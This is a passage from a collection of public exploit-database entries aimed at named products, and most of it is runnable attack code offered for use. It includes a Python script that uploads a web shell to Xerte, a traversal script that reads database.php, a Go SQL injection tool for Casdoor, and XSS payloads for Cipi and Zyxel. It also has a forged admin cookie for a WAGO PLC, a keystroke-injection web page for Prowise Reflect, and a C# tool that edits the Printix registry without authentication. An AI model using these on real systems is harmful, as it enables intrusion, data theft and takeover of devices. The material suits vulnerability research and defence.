print('[-] Unknown error occured, unable to add room. Maybe the room has already been added')
exit()
print('[*] Testing code exection')
output = test_code_execution(target = target)
if output != False:
print(f"[+] Code executed successfully, Go to {target}/dati/selectappartamenti.php and execute the code with the parameter 'cmd'.")
print(f'[+] Example : {target}/dati/selectappartamenti.php?cmd=id')
print(f"[+] Example Output : {output}")
exit()
else:
print(f"[-] Code execution failed. If the Target is Windows, Check {target}/dati/selectappartamenti.php and try execute the code with the parameter 'cmd'. Example : {target}/dati/selectappartamenti.php?cmd=hostname")
exit()
main()
# Exploit Title: Cipi Control Panel 3.1.15 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 24.02.2022
# Exploit Author: Fikrat Ghuliev (Ghuliev)
# Vendor Homepage: https://cipi.sh/ <https://www.aapanel.com/>
# Software Link: https://cipi.sh/ <https://www.aapanel.com/>
# Version: 3.1.15
# Tested on: Ubuntu
When the user wants to add a new server on the "Server" panel, in "name"
parameter has not had any filtration.
POST /api/servers HTTP/1.1
Host: IP
Content-Length: 102
Accept: application/json
X-Requested-With: XMLHttpRequest
Authorization: Bearer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Content-Type: application/json
Origin: http://IP
Referer: http://IP/servers
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
{
"name":"\"><script>alert(1337)</script>",
"ip":"10.10.10.10",
"provider":"local",
"location":"xss test"
}
# Exploit Title: Wondershare MobileTrans 3.5.9 - 'ElevationService' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-17
# Vendor Homepage: https://www.wondershare.com/
# Software Link : https://download.wondershare.com/mobiletrans_full5793.exe
# Tested Version: 3.5.9
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ElevationService" | findstr /i /v """
Wondershare Driver Install Service help ElevationService C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe Auto
# Service info:
C:\>sc qc ElevationService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ElevationService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wondershare Driver Install Service help
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
# Exploit Title: Cobian Reflector 0.9.93 RC1 - 'Password' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-16
# Vendor Homepage: https://www.cobiansoft.com/
# Software Link: https://files.cobiansoft.com/programs/crSetup-0.9.93-RC1.exe
# Tested Version: 0.9.93 RC1
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to Produce the Crash:
# 1.- Run python code: Cobian_Reflector_0.9.93_RC1.py
# 2.- Open Cobian_Reflector_0.9.93_RC1.txt and copy content to clipboard
# 3.- Open "Cobian Reflector User Interface"
# 4.- Task -> "New task"
# 5.- Files -> Source "Add" -> SFTP
# 6.- Host -> 10.10.10.10
# 7.- Port-> 22
# 8.- User name -> admin
# 9.- Paste ClipBoard on "Password"
# 10.- Test settings
# 11.- Yes
# 12.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 8000
f = open ("Cobian_Reflector_0.9.93_RC1.txt", "w")
f.write(buffer)
f.close()
# Exploit Title: Cobian Backup 11 Gravity 11.2.0.582 - 'Password' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-16
# Vendor Homepage: https://www.cobiansoft.com/
# Software Link: https://files.cobiansoft.com/programs/cbSetup.exe
# Tested Version: 11.2.0.582
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to Produce the Crash:
# 1.- Run python code: Cobian_Backup_11.2.0.582.py
# 2.- Open Cobian_Backup_11.2.0.582.txt and copy content to clipboard
# 3.- Open "Cobian Backup 11 Gravity User Interface"
# 4.- Task -> "New task"
# 5.- File -> Source "Add" -> FTP
# 6.- Host -> 10.10.10.10
# 7.- Port-> 21
# 8.- User name -> admin
# 9.- Paste ClipBoard on "Password"
# 10.- Ok
# 11.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 800
f = open ("Cobian_Backup_11.2.0.582.txt", "w")
f.write(buffer)
f.close()
# Exploit Title: Cobian Backup Gravity 11.2.0.582 - 'CobianBackup11' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-24
# Vendor Homepage: https://www.cobiansoft.com/
# Software Link : https://files.cobiansoft.com/programs/cbSetup.exe
# Tested Version: 11.2.0.582
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Gravity " | findstr /i /v """
Cobian Backup 11 Gravity CobianBackup11 C:\Program Files (x86)\Cobian Backup 11\cbService.exe Auto
# Service info:
C:\>sc qc CobianBackup11
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: CobianBackup11
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Cobian Backup 11\cbService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Cobian Backup 11 Gravity
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
// Exploit Title: Casdoor 1.13.0 - SQL Injection (Unauthenticated)
// Date: 2022-02-25
// Exploit Author: Mayank Deshmukh
// Vendor Homepage: https://casdoor.org/
// Software Link: https://github.com/casdoor/casdoor/releases/tag/v1.13.0
// Version: version < 1.13.1
// Security Advisory: https://github.com/advisories/GHSA-m358-g4rp-533r
// Tested on: Kali Linux
// CVE : CVE-2022-24124
// Github POC: https://github.com/ColdFusionX/CVE-2022-24124
// Exploit Usage : go run exploit.go -u http://127.0.0.1:8080
package main
import (
"flag"
"fmt"
"html"
"io/ioutil"
"net/http"
"os"
"regexp"
"strings"
)
func main() {
var url string
flag.StringVar(&url, "u", "", "Casdoor URL (ex. http://127.0.0.1:8080)")
flag.Parse()
banner := `
-=Casdoor SQL Injection (CVE-2022-24124)=-
- by Mayank Deshmukh (ColdFusionX)
`
fmt.Printf(banner)
fmt.Println("[*] Dumping Database Version")
response, err := http.Get(url + "/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(null,version(),null)")
if err != nil {
panic(err)
}
defer response.Body.Close()
databytes, err := ioutil.ReadAll(response.Body)
if err != nil {
panic(err)
}
content := string(databytes)
re := regexp.MustCompile("(?i)(XPATH syntax error.*')")
result := re.FindAllString(content, -1)
sqliop := fmt.Sprint(result)
replacer := strings.NewReplacer("[", "", "]", "", "'", "", ";", "")
finalop := replacer.Replace(sqliop)
fmt.Println(html.UnescapeString(finalop))
if result == nil {
fmt.Printf("Application not vulnerable\n")
os.Exit(1)
}
}
# Exploit Title: WAGO 750-8212 PFC200 G2 2ETH RS Privilege Escalation
# Date: 02/16/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy) at Cypro AB
# Vendor Homepage: https://www.wago.com
# Version: Firmware version 03.05.10(17)
# Tested on: PopOS! [Linux](Firefox)
========================================
= The ordinary user privilege request:
========================================
GET /wbm/ HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://192.168.1.1/wbm/
Cookie: NG_WBM_SESSION=qru3ocrpde79m5f73526i65uv5; user={%22name%22:%22user%22%2C%22roles%22:[%22user%22%2C%22guest%22]%2C%22hasDefaultPassword%22:true%2C%22csrf%22:%22U2fJfixrfWtLEbVFL6b71oou1yk1WqKTsdFo52yavqrTF86f%22%2C%22timestamp%22:1642368720673%2C%22sessionExists%22:true}
==========================================
= Manipulated Cookie to Admin Privilege:
==========================================
GET /wbm/ HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://192.168.1.1/wbm/
Cookie: NG_WBM_SESSION=qru3ocrpde79m5f73526i65uv5; user={%22name%22:%22admin%22%2C%22roles%22:[%22admin%22%2C%22admin%22]%2C%22hasDefaultPassword%22:true%2C%22csrf%22:%22U2fJfixrfWtLEbVFL6b71oou1yk1WqKTsdFo52yavqrTF86f%22%2C%22timestamp%22:1642369499829%2C%22sessionExists%22:true}
# Exploit Title: Xerte 3.9 - Remote Code Execution (RCE) (Authenticated)
# Date: 05/03/2021
# Exploit Author: Rik Lutz
# Vendor Homepage: https://xerte.org.uk
# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.8.5-33.zip
# Version: up until version 3.9
# Tested on: Windows 10 XAMP
# CVE : CVE-2021-44664
# This PoC assumes guest login is enabled and the en-GB langues files are used.
# This PoC wil overwrite the existing langues file (.inc) for the englisch index page with a shell.
# Vulnerable url: https://<host>/website_code/php/import/fileupload.php
# The mediapath variable can be used to set the destination of the uploaded.
# Create new project from template -> visit "Properties" (! symbol) -> Media and Quota
import requests
import re
xerte_base_url = "http://127.0.0.1"
php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here.
with requests.Session() as session:
# Get a PHP session ID
if not php_session_id:
session.get(xerte_base_url)
else:
session.cookies.set("PHPSESSID", php_session_id)
# Use a default template
data = {
'tutorialid': 'Nottingham',
'templatename': 'Nottingham',
'tutorialname': 'exploit',
'folder_id': ''
}
# Create a new project in order to find the install path
template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data)
# Find template ID
data = {
'template_id': re.findall('(\d+)', template_id.text)[0]
}
# Find the install path:
install_path = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data)
install_path = re.findall('mediapath" value="(.+?)"', install_path.text)[0]
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'nl,en-US;q=0.7,en;q=0.3',
'Content-Type': 'multipart/form-data; boundary=---------------------------170331411929658976061651588978',
}
# index.inc file
data = \
'''-----------------------------170331411929658976061651588978
Content-Disposition: form-data; name="filenameuploaded"; filename="index.inc"
Content-Type: application/octet-stream
<?php
if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }
/**
*
* index.php english language file
*
* @author Patrick Lockley
* @version 1.0
* @copyright Pat Lockley
* @package
*/
define("INDEX_USERNAME_AND_PASSWORD_EMPTY", "Please enter your username and password");
define("INDEX_USERNAME_EMPTY", "Please enter your username");
define("INDEX_PASSWORD_EMPTY", "Please enter your password");
define("INDEX_LDAP_MISSING", "PHP\'s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available");
define("INDEX_SITE_ADMIN", "Site admins should log on on the manangement page");
define("INDEX_LOGON_FAIL", "Sorry that password combination was not correct");
define("INDEX_LOGIN", "login area");
define("INDEX_USERNAME", "Username");
define("INDEX_PASSWORD", "Password");
define("INDEX_HELP_TITLE", "Getting Started");
define("INDEX_HELP_INTRODUCTION", "We\'ve produced a short introduction to the Toolkits website.");
define("INDEX_HELP_INTRO_LINK_TEXT","Show me!");
define("INDEX_NO_LDAP","PHP\'s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available");
define("INDEX_FOLDER_PROMPT","What would you like to call your folder?");
define("INDEX_WORKSPACE_TITLE","My Projects");
define("INDEX_CREATE","Project Templates");
define("INDEX_DETAILS","Project Details");
define("INDEX_SORT","Sort");
define("INDEX_SEARCH","Search");
define("INDEX_SORT_A","Alphabetical A-Z");
define("INDEX_SORT_Z","Alphabetical Z-A");
define("INDEX_SORT_NEW","Age (New to Old)");
define("INDEX_SORT_OLD","Age (Old to New)");
define("INDEX_LOG_OUT","Log out");
define("INDEX_LOGGED_IN_AS","Logged in as");
define("INDEX_BUTTON_LOGIN","Login");
define("INDEX_BUTTON_LOGOUT","Logout");
define("INDEX_BUTTON_PROPERTIES","Properties");
define("INDEX_BUTTON_EDIT","Edit");
define("INDEX_BUTTON_PREVIEW", "Preview");
define("INDEX_BUTTON_SORT", "Sort");
define("INDEX_BUTTON_NEWFOLDER", "New Folder");
define("INDEX_BUTTON_NEWFOLDER_CREATE", "Create");
define("INDEX_BUTTON_DELETE", "Delete");
define("INDEX_BUTTON_DUPLICATE", "Duplicate");
define("INDEX_BUTTON_PUBLISH", "Publish");
define("INDEX_BUTTON_CANCEL", "Cancel");
define("INDEX_BUTTON_SAVE", "Save");
define("INDEX_XAPI_DASHBOARD_FROM", "From:");
define("INDEX_XAPI_DASHBOARD_UNTIL", "Until:");
define("INDEX_XAPI_DASHBOARD_GROUP_SELECT", "Select group:");
define("INDEX_XAPI_DASHBOARD_GROUP_ALL", "All groups");
define("INDEX_XAPI_DASHBOARD_SHOW_NAMES", "Show names and/or email addresses");
define("INDEX_XAPI_DASHBOARD_CLOSE", "Close dashboard");
define("INDEX_XAPI_DASHBOARD_DISPLAY_OPTIONS", "Display options");
define("INDEX_XAPI_DASHBOARD_SHOW_HIDE_COLUMNS", "Show / hide columns");
define("INDEX_XAPI_DASHBOARD_QUESTION_OVERVIEW", "Interaction overview");
define("INDEX_XAPI_DASHBOARD_PRINT", "Print");
\r
\r
-----------------------------170331411929658976061651588978
Content-Disposition: form-data; name="mediapath"
''' \
+ install_path \
+ '''../../../languages/en-GB/
-----------------------------170331411929658976061651588978--\r
'''
# Overwrite index.inc file
response = session.post(xerte_base_url + '/website_code/php/import/fileupload.php', headers=headers, data=data)
print('Installation path: ' + install_path)
print(response.text)
if "success" in response.text:
print("Visit shell @: " + xerte_base_url + '/?cmd=whoami')
# Exploit Title: Xerte 3.10.3 - Directory Traversal (Authenticated)
# Date: 05/03/2021
# Exploit Author: Rik Lutz
# Vendor Homepage: https://xerte.org.uk
# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.9.zip
# Version: up until 3.10.3
# Tested on: Windows 10 XAMP
# CVE : CVE-2021-44665
# This PoC assumes guest login is enabled. Vulnerable url:
# https://<host>/getfile.php?file=<user-direcotry>/../../database.php
# You can find a userfiles-directory by creating a project and browsing the media menu.
# Create new project from template -> visit "Properties" (! symbol) -> Media and Quota -> Click file to download
# The userfiles-direcotry will be noted in the URL and/or when you download a file.
# They look like: <numbers>-<username>-<templatename>
import requests
import re
xerte_base_url = "http://127.0.0.1"
file_to_grab = "/../../database.php"
php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here.
with requests.Session() as session:
# Get a PHP session ID
if not php_session_id:
session.get(xerte_base_url)
else:
session.cookies.set("PHPSESSID", php_session_id)
# Use a default template
data = {
'tutorialid': 'Nottingham',
'templatename': 'Nottingham',
'tutorialname': 'exploit',
'folder_id': ''
}
# Create a new project in order to create a user-folder
template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data)
# Find template ID
data = {
'template_id': re.findall('(\d+)', template_id.text)[0]
}
# Find the created user-direcotry:
user_direcotry = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data)
user_direcotry = re.findall('USER-FILES\/([0-9]+-[a-z0-9]+-[a-zA-Z0-9_]+)', user_direcotry.text)[0]
# Grab file
result = session.get(xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)
print(result.text)
print("|-- Used Variables: --|")
print("PHP Session ID: " + session.cookies.get_dict()['PHPSESSID'])
print("user direcotry: " + user_direcotry)
print("Curl example:")
print('curl --cookie "PHPSESSID=' + session.cookies.get_dict()['PHPSESSID'] + '" ' + xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)
# Exploit Title: Prowise Reflect v1.0.9 - Remote Keystroke Injection
# Date: 30/10/2022
# Exploit Author: Rik Lutz
# Vendor Homepage: https://www.prowise.com/
# Version: V1.0.9
# Tested on: Windows 10
# Prowise Reflect software version 1.0.9 for Windows is vulnerable to a remote keystroke injection.
# Much like how a rubber ducky attack works but this works either over the network (when port 8082 is exposed),
# or by visiting a malicious website. This POC contains the malicious webpage.
# Steps:
# 1. Start Prowise reflect
# 2. Try to connect to a reflect server e.q. ygm7u6od
# 3. When it is connecting click exploit
# - Start menu will open, types notepad.exe and types hello world.
<!DOCTYPE HTML>
<html>
<head>
<script type = "text/javascript">
function wait(ms){
var start = new Date().getTime();
var end = start;
while(end < start + ms) {
end = new Date().getTime();
}
}
function WebSocketTest() {
var StateConnecting = new Boolean(false);
if ("WebSocket" in window) {
// Let us open a web socket
var ws = new WebSocket("ws://localhost:8082");
ws.onopen = function() {
ws.send('{"event":"keyboard", "key":"super"}');
wait(400);
//character is slower
// ws.send('{"event":"keyboard", "character":"notepad.exe"}'};
// You can check for connecting state by sending {"event":"setupRTCConnection", "remoteName":"a"} if the response is {"event":"streamAvailable"} getIsConnecting == true
var exploitcode = "notepad.exe"
for (let i = 0; i < exploitcode.length; i++) {
ws.send('{"event":"keyboard", "key":"' + exploitcode[i] + '"}');
}
wait(300);
ws.send('{"event":"keyboard", "key":"enter"}');
wait(2000);
exploitcode = "Hello world!"
for (let i = 0; i < exploitcode.length; i++) {
ws.send('{"event":"keyboard", "key":"' + exploitcode[i] + '"}');
}
wait(200);
};
ws.onmessage = function (evt) {
var received_msg = evt.data;
};
ws.onclose = function() {
// websocket is closed.
alert("Connection is closed...");
};
} else {
// The browser doesn't support WebSocket
alert("WebSocket NOT supported by your Browser!");
}
}
</script>
</head>
<body>
<div id = "sse">
<a href = "javascript:WebSocketTest()">Exploit!</a>
</div>
</body>
</html>
# Exploit Title: Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS)
# Date: 1/3/2022
# Exploit Author: Momen Eldawakhly (CyberGuy)
# Vendor Homepage: https://www.zyxel.com
# Version: ZyWALL 2 Plus
# Tested on: Ubuntu Linux [Firefox]
# CVE : CVE-2021-46387
GET /Forms/rpAuth_1?id=%3C/form%3E%3CiMg%20src=x%20onerror=%22prompt(1)%22%3E%3Cform%3E HTTP/1.1
Host: vuln.ip:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
# Exploit Title: Printix Client 1.3.1106.0 - Remote Code Execution (RCE)
# Date: 3/1/2022
# Exploit Author: Logan Latvala
# Vendor Homepage: https://printix.net
# Software Link: https://software.printix.net/client/win/1.3.1106.0/PrintixClientWindows.zip
# Version: <= 1.3.1106.0
# Tested on: Windows 7, Windows 8, Windows 10, Windows 11
# CVE : CVE-2022-25089
# Github for project: https://github.com/ComparedArray/printix-CVE-2022-25089
using Microsoft.Win32;
using Newtonsoft.Json;
using Newtonsoft.Json.Converters;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Text;
using System.Threading;
using System.Threading.Tasks;
/**
* ________________________________________
*
* Printix Vulnerability, CVE-2022-25089
* Part of a Printix Vulnerability series
* Author: Logan Latvala
* Github: https://github.com/ComparedArray/printix-CVE-2022-25089
* ________________________________________
*
*/
namespace ConsoleApp1a
{
public class PersistentRegistryData
{
public PersistentRegistryCmds cmd;
public string path;
public int VDIType;
public byte[] registryData;
}
[JsonConverter(typeof(StringEnumConverter))]
public enum PersistentRegistryCmds
{
StoreData = 1,
DeleteSubTree,
RestoreData
}
public class Session
{
public int commandNumber { get; set; }
public string host { get; set; }
public string data { get; set; }
public string sessionName { get; set; }
public Session(int commandSessionNumber = 0)
{
commandNumber = commandSessionNumber;
switch (commandSessionNumber)
{
//Incase it's initiated, kill it immediately.
case (0):
Environment.Exit(0x001);
break;
//Incase the Ping request is sent though, get its needed data.
case (2):
Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n");
Console.Write("IP: ");
host = Console.ReadLine();
Console.WriteLine("Host address set to: " + host);
data = "pingData";
sessionName = "PingerRinger";
break;
//Incase the RegEdit request is sent though, get its needed data.
case (49):
Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n");
Console.Write("IP: ");
host = Console.ReadLine();
Console.WriteLine("Host address set to: " + host);
PersistentRegistryData persistentRegistryData = new PersistentRegistryData();
persistentRegistryData.cmd = PersistentRegistryCmds.RestoreData;
persistentRegistryData.VDIType = 12; //(int)DefaultValues.VDIType;
//persistentRegistryData.path = "printix\\SOFTWARE\\Intel\\HeciServer\\das\\SocketServiceName";
Console.WriteLine("\n What Node starting from \\\\Local-Machine\\ would you like to select? \n");
Console.WriteLine("Example: HKEY_LOCAL_MACHINE\\SOFTWARE\\Intel\\HeciServer\\das\\SocketServiceName\n");
Console.WriteLine("You can only change values in HKEY_LOCAL_MACHINE");
Console.Write("Registry Node: ");
persistentRegistryData.path = "" + Console.ReadLine().Replace("HKEY_LOCAL_MACHINE","printix");
Console.WriteLine("Full Address Set To: " + persistentRegistryData.path);
//persistentRegistryData.registryData = new byte[2];
//byte[] loader = selectDataType("Intel(R) Capability Licensing stuffidkreally", RegistryValueKind.String);
Console.WriteLine("\n What Data type are you using? \n1. String 2. Dword 3. Qword 4. Multi String \n");
Console.Write("Type: ");
int dataF = int.Parse(Console.ReadLine());
Console.WriteLine("Set Data to: " + dataF);
Console.WriteLine("\n What value is your type? \n");
Console.Write("Value: ");
string dataB = Console.ReadLine();
Console.WriteLine("Set Data to: " + dataF);
byte[] loader = null;
List<byte> byteContainer = new List<byte>();
//Dword = 4
//SET THIS NUMBER TO THE TYPE OF DATA YOU ARE USING! (CHECK ABOVE FUNCITON selectDataType()!)
switch (dataF)
{
case (1):
loader = selectDataType(dataB, RegistryValueKind.String);
byteContainer.Add(1);
break;
case (2):
loader = selectDataType(int.Parse(dataB), RegistryValueKind.DWord);
byteContainer.Add(4);
break;
case (3):
loader = selectDataType(long.Parse(dataB), RegistryValueKind.QWord);
byteContainer.Add(11);
break;
case (4):
loader = selectDataType(dataB.Split('%'), RegistryValueKind.MultiString);
byteContainer.Add(7);
break;
}
int pathHolder = 0;
foreach (byte bit in loader)
{
pathHolder++;
byteContainer.Add(bit);
}
persistentRegistryData.registryData = byteContainer.ToArray();
//added stuff:
//PersistentRegistryData data = new PersistentRegistryData();
//data.cmd = PersistentRegistryCmds.RestoreData;
//data.path = "";
//data.cmd
Console.WriteLine(JsonConvert.SerializeObject(persistentRegistryData));
data = JsonConvert.SerializeObject(persistentRegistryData);
break;
//Custom cases, such as custom JSON Inputs and more.
case (100):
Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n");
Console.Write("IP: ");
host = Console.ReadLine();
Console.WriteLine("Host address set to: " + host);
Console.WriteLine("\n What Data Should Be Sent?\n");
Console.Write("Data: ");
data = Console.ReadLine();
Console.WriteLine("Data set to: " + data);
Console.WriteLine("\n What Session Name Should Be Used? \n");
Console.Write("Session Name: ");
sessionName = Console.ReadLine();
Console.WriteLine("Session name set to: " + sessionName);
break;
}
}
public static byte[] selectDataType(object value, RegistryValueKind format)
{
byte[] array = new byte[50];
switch (format)
{
case RegistryValueKind.String: //1
array = Encoding.UTF8.GetBytes((string)value);
break;
case RegistryValueKind.DWord://4
array = ((!(value.GetType() == typeof(int))) ? BitConverter.GetBytes((long)value) : BitConverter.GetBytes((int)value));
break;
case RegistryValueKind.QWord://11
if (value == null)
{
value = 0L;
}
array = BitConverter.GetBytes((long)value);
break;
case RegistryValueKind.MultiString://7
{
if (value == null)
{
value = new string[1] { string.Empty };
}
string[] array2 = (string[])value;
foreach (string s in array2)
{
byte[] bytes = Encoding.UTF8.GetBytes(s);
byte[] second = new byte[1] { (byte)bytes.Length };
array = array.Concat(second).Concat(bytes).ToArray();
}
break;
}
}
return array;
}
}
class CVESUBMISSION
{
static void Main(string[] args)
{
FORCERESTART:
try
{
//Edit any registry without auth:
//Use command 49, use the code provided on the desktop...
//This modifies it directly, so no specific username is needed. :D
//The command parameter, a list of commands is below.
int command = 43;
//To force the user to input variables or not.
bool forceCustomInput = false;
//The data to send, this isn't flexible and should be used only for specific examples.
//Try to keep above 4 characters if you're just shoving things into the command.
string data = "{\"profileID\":1,\"result\":true}";
//The username to use.
//This is to fulfill the requriements whilst in development mode.
DefaultValues.CurrentSessName = "printixMDNs7914";
//The host to connect to. DEFAULT= "localhost"
string host = "192.168.1.29";
// Configuration Above
InvalidInputLabel:
Console.Clear();
Console.WriteLine("Please select the certificate you want to use with port 21338.");
//Deprecated, certificates are no longer needed to verify, as clientside only uses the self-signed certificates now.
Console.WriteLine("Already selected, client authentication isn't needed.");
Console.WriteLine(" /───────────────────────────\\ ");
Console.WriteLine("\nWhat would you like to do?");
Console.WriteLine("\n 1. Send Ping Request");
Console.WriteLine(" 2. Send Registry Edit Request");
Console.WriteLine(" 3. Send Custom Request");
Console.WriteLine(" 4. Experimental Mode (Beta)\n");
Console.Write("I choose option # ");
try
{
switch (int.Parse(Console.ReadLine().ToLower()))
{
case (1):
Session session = new Session(2);
command = session.commandNumber;
host = session.host;
data = session.data;
DefaultValues.CurrentSessName = "printixReflectorPackage_" + new Random().Next(1, 200);
break;
case (2):
Session sessionTwo = new Session(49);
command = sessionTwo.commandNumber;
host = sessionTwo.host;
data = sessionTwo.data;
DefaultValues.CurrentSessName = "printixReflectorPackage_" + new Random().Next(1, 200);
break;
case (3):
Console.WriteLine("What command number do you want to input?");
command = int.Parse(Console.ReadLine().ToString());
Console.WriteLine("What IP would you like to use? (Default = localhost)");
host = Console.ReadLine();
Console.WriteLine("What data do you want to send? (Keep over 4 chars if you are not sure!)");
data = Console.ReadLine();
Console.WriteLine("What session name do you want to use? ");
DefaultValues.CurrentSessName = Console.ReadLine();
break;
case (4):
Console.WriteLine("Not yet implemented.");
break;
}
}
catch (Exception e)
{
Console.WriteLine("Invalid Input!");
goto InvalidInputLabel;
}
Console.WriteLine("Proof Of Concept For CVE-2022-25089 | Version: 1.3.24 | Created by Logan Latvala");
Console.WriteLine("This is a RAW API, in which you may get unintended results from usage.\n");
CompCommClient client = new CompCommClient();
byte[] responseStorage = new byte[25555];
int responseCMD = 0;
client.Connect(host, 21338, 3, 10000);
client.SendMessage(command, Encoding.UTF8.GetBytes(data));
// Theory: There is always a message being sent, yet it doesn't read it, or can't intercept it.
// Check for output multiple times, and see if this is conclusive.
//client.SendMessage(51, Encoding.ASCII.GetBytes(data));
new Thread(() => {
//Thread.Sleep(4000);
if (client.Connected())
{
int cam = 0;
// 4 itterations of loops, may be lifted in the future.
while (cam < 5)
{
//Reads the datastream and keeps returning results.
//Thread.Sleep(100);
try
{
try
{
if (responseStorage?.Any() == true)
{
//List<byte> byo1 = responseStorage.ToList();
if (!Encoding.UTF8.GetString(responseStorage).Contains("Caption"))
{
foreach (char cam2 in Encoding.UTF8.GetString(responseStorage))
{
if (!char.IsWhiteSpace(cam2) && char.IsLetterOrDigit(cam2) || char.IsPunctuation(cam2))
{
Console.Write(cam2);
}
}
}else
{
}
}
}
catch (Exception e) { Debug.WriteLine(e); }
client.Read(out responseCMD, out responseStorage);
}
catch (Exception e)
{
goto ReadException;
}
Thread.Sleep(100);
cam++;
//Console.WriteLine(cam);
}
}
else
{
Console.WriteLine("[WARNING]: Client is Disconnected!");
}
ReadException:
try
{
Console.WriteLine("Command Variable Response: " + responseCMD);
Console.WriteLine(Encoding.UTF8.GetString(responseStorage) + " || " + responseCMD);
client.disConnect();
}
catch (Exception e)
{
Console.WriteLine("After 4.2 Seconds, there has been no response!");
client.disConnect();
}
}).Start();
Console.WriteLine(responseCMD);
Console.ReadLine();
}
catch (Exception e)
{
Console.WriteLine(e);
Console.ReadLine();
//Environment.Exit(e.HResult);
}
goto FORCERESTART;
}
}
}